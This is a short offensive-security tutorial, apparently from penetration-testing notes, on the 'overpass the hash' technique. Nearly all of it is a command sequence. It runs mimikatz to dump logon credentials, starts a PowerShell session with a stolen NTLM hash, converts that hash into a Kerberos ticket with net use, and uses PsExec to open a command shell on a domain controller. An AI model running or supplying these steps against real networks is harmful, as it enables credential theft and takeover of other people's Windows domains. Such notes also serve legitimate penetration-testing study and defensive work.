Overpass the hash
With overpass the hash, we abuse an NTLM user hash to obtain a full Kerberos Ticket Granting Ticket (TGT) or service ticket, which grants us access to another machine or service as that user.
Transfer all three mimikatz files to the target and run mimikatz.exe:
mimikatz.exe

Enable debug privileges:
privilege::debug

Dump logon credentials (skip this step if you already have the hash):
sekurlsa::logonpasswords

Start a new process using the NTLM hash:
sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlm hash> /run:PowerShell.exe

At this point we have a new PowerShell session that allows us to execute commands as <user>. Exit mimikatz and list the cached tickets in that session:
klist

No Kerberos tickets have been cached, but this is expected since <user> has not performed an interactive login. However, we can generate a TGT by authenticating to a network share on the domain controller (or to another service) with net use:
net use \\<dc_machine_name>
klist

We have now converted our NTLM hash into a Kerberos TGT, allowing us to use any tools that rely on Kerberos authentication (as opposed to NTLM), such as the official PsExec application from Microsoft:
.\PsExec.exe \\<dc_machine_name> cmd.exe

Run ipconfig in the new shell to confirm that we have successfully reused the Kerberos TGT to launch a command shell on the domain controller.